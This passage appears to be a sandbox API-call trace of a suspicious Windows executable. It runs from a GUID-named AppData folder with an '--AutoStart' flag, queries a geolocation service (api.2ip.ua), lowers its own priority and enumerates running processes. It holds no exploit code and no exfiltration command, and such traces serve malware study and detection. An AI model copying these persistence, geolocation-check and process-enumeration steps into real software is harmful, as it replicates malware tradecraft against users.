[0199.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0199.766] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x18) returned 0x770d98 [0199.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x770d98, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0199.766] GetLastError () returned 0x0 [0199.767] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x54 [0199.767] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x58) returned 0x770e98 [0199.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0199.767] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1b) returned 0x76f440 [0199.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x76f440, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0199.767] GetLastError () returned 0x0 [0199.767] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x58 [0199.767] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x5c) returned 0x770e98 [0199.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0199.767] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x24) returned 0x76adc8 [0199.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x76adc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0199.767] GetLastError () returned 0x0 [0199.767] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x5c [0199.767] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x60) returned 0x770e98 [0199.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0199.767] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x29) returned 0x76b440 [0199.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x76b440, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0199.767] GetLastError () returned 0x0 [0199.767] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x60 [0199.767] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x64) returned 0x770e98 [0199.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0199.767] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1e) returned 0x76f468 [0199.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x76f468, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0199.767] GetLastError () returned 0x0 [0199.767] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x64 [0199.767] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x68) returned 0x770e98 [0199.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0199.767] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x41) returned 0x766f20 [0199.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x766f20, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0199.768] GetLastError () returned 0x0 [0199.768] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x68 [0199.768] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x6c) returned 0x770e98 [0199.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0199.768] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x17) returned 0x770dd8 [0199.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x770dd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0199.768] GetLastError () returned 0x0 [0199.768] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x6c [0199.768] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x70) returned 0x770e98 [0199.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0199.768] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x14) returned 0x770df8 [0199.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x770df8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SESSIONNAME=Console", lpUsedDefaultChar=0x0) returned 20 [0199.768] GetLastError () returned 0x0 [0199.768] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x70 [0199.768] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x74) returned 0x770e98 [0199.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0199.768] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xf) returned 0x76e9d0 [0199.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x76e9d0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0199.768] GetLastError () returned 0x0 [0199.768] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x74 [0199.768] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x78) returned 0x770e98 [0199.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0199.768] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x16) returned 0x770f18 [0199.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x770f18, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0199.768] GetLastError () returned 0x0 [0199.768] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x78 [0199.768] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x7c) returned 0x770f38 [0199.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0199.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2a) returned 0x76b478 [0199.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x76b478, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0199.769] GetLastError () returned 0x0 [0199.769] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770f38) returned 0x7c [0199.769] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770f38, Size=0x80) returned 0x770f38 [0199.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0199.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x29) returned 0x76b4b0 [0199.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x76b4b0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0199.769] GetLastError () returned 0x0 [0199.769] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770f38) returned 0x80 [0199.769] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770f38, Size=0x84) returned 0x770f38 [0199.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0199.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x15) returned 0x770e98 [0199.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x770e98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0199.769] GetLastError () returned 0x0 [0199.769] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770f38) returned 0x84 [0199.769] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770f38, Size=0x88) returned 0x770f38 [0199.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0199.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1e) returned 0x76f490 [0199.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x76f490, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0199.769] GetLastError () returned 0x0 [0199.769] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770f38) returned 0x88 [0199.769] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770f38, Size=0x8c) returned 0x770f38 [0199.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0199.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2a) returned 0x76b4e8 [0199.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x76b4e8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0199.769] GetLastError () returned 0x0 [0199.769] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770f38) returned 0x8c [0199.770] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770f38, Size=0x90) returned 0x770f38 [0199.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0199.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x12) returned 0x770eb8 [0199.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x770eb8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0199.770] GetLastError () returned 0x0 [0199.770] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770f38) returned 0x90 [0199.770] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770f38, Size=0x94) returned 0x770f38 [0199.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0199.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x18) returned 0x770ed8 [0199.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x770ed8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0199.770] GetLastError () returned 0x0 [0199.770] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770f38) returned 0x94 [0199.770] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770f38, Size=0x98) returned 0x770f38 [0199.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0199.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x46) returned 0x766f70 [0199.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x766f70, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0199.770] GetLastError () returned 0x0 [0199.770] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770f38) returned 0x98 [0199.770] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770f38, Size=0x9c) returned 0x770f38 [0199.770] GetLastError () returned 0x0 [0199.821] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770a08) returned 0x80 [0199.822] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770a08) returned 0x80 [0199.822] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770a08) returned 0x80 [0199.841] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8ec) returned 0x771fd8 [0199.877] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770a08) returned 0x80 [0199.877] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10) returned 0x76e9e8 [0199.877] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770a08) returned 0x80 [0199.878] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770a08) returned 0x80 [0199.878] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770a08) returned 0x80 [0199.917] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770a08) returned 0x80 [0199.925] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0200.181] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x765e98 [0200.181] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0202.824] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18ae18, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18d618 | out: lpBuffer=0x18ae18*, lpdwNumberOfBytesRead=0x18d618*=0x1d0) returned 1 [0202.825] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0202.831] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0202.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x77d650 [0202.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1e0) returned 0x3242b88 [0202.844] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3242b88 | out: hHeap=0x750000) returned 1 [0202.850] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x77d650 | out: hHeap=0x750000) returned 1 [0202.850] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x765e98 | out: hHeap=0x750000) returned 1 [0202.850] GetCurrentProcess () returned 0xffffffff [0202.850] GetLastError () returned 0x2 [0202.850] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0202.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10) returned 0x799ef8 [0202.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8ec) returned 0x3249c88 [0202.862] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x7a20b0 [0202.862] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7a20b0, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1a3e.tmp.exe.exe")) returned 0x61 [0202.862] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41") returned 1 [0202.867] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x325f450 [0202.867] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --AutoStart" [0202.867] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --AutoStart", pNumArgs=0x18d6f8 | out: pNumArgs=0x18d6f8) returned 0x79dc60*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe" [0202.868] lstrcpyW (in: lpString1=0x18e388, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe" [0202.873] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --AutoStart" [0202.874] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --AutoStart", pNumArgs=0x18d694 | out: pNumArgs=0x18d694) returned 0x79dc60*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe" [0202.874] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe") returned="1A3E.TMP.EXE.exe" [0202.874] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x759e0000 [0202.874] GetProcAddress (hModule=0x759e0000, lpProcName="EnumProcesses") returned 0x0 [0202.875] GetProcAddress (hModule=0x759e0000, lpProcName="EnumProcessModules") returned 0x0 [0202.875] GetProcAddress (hModule=0x759e0000, lpProcName="GetModuleBaseNameW") returned 0x0 [0202.875] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x772d0000 [0202.921] GetProcAddress (hModule=0x772d0000, lpProcName="EnumProcesses") returned 0x772d1544 [0202.921] GetProcAddress (hModule=0x772d0000, lpProcName="EnumProcessModules") returned 0x772d1408 [0202.922] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleBaseNameW") returned 0x772d152c [0202.922] EnumProcesses (in: lpidProcess=0x182e90, cb=0xa000, lpcbNeeded=0x18d6a0 | out: lpidProcess=0x182e90, lpcbNeeded=0x18d6a0) returned 1 [0202.924] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0202.924] CloseHandle (hObject=0x0) returned 0 [0202.924] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0202.925] CloseHandle (hObject=0x0) returned 0 [0202.925] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0202.925] CloseHandle (hObject=0x0) returned 0 [0202.925] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x154) returned 0x0 [0202.925] CloseHandle (hObject=0x0) returned 0 [0202.925] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0202.925] CloseHandle (hObject=0x0) returned 0 [0202.925] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x190) returned 0x0 [0202.925] CloseHandle (hObject=0x0) returned 0 [0202.925] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b8) returned 0x0 [0202.925] CloseHandle (hObject=0x0) returned 0 [0202.925] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0202.925] CloseHandle (hObject=0x0) returned 0 [0202.925] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0202.925] CloseHandle (hObject=0x0) returned 0 [0202.925] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0202.925] CloseHandle (hObject=0x0) returned 0 [0202.925] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0202.925] CloseHandle (hObject=0x0) returned 0 [0202.925] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2a0) returned 0x0 [0202.925] CloseHandle (hObject=0x0) returned 0 [0202.926] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2d4) returned 0x0 [0202.926] CloseHandle (hObject=0x0) returned 0 [0202.926] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x344) returned 0x0 [0202.926] CloseHandle (hObject=0x0) returned 0 [0202.926] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x37c) returned 0x0 [0202.926] CloseHandle (hObject=0x0) returned 0 [0202.926] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3b8) returned 0x0 [0202.926] CloseHandle (hObject=0x0) returned 0 [0202.926] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf0) returned 0x0 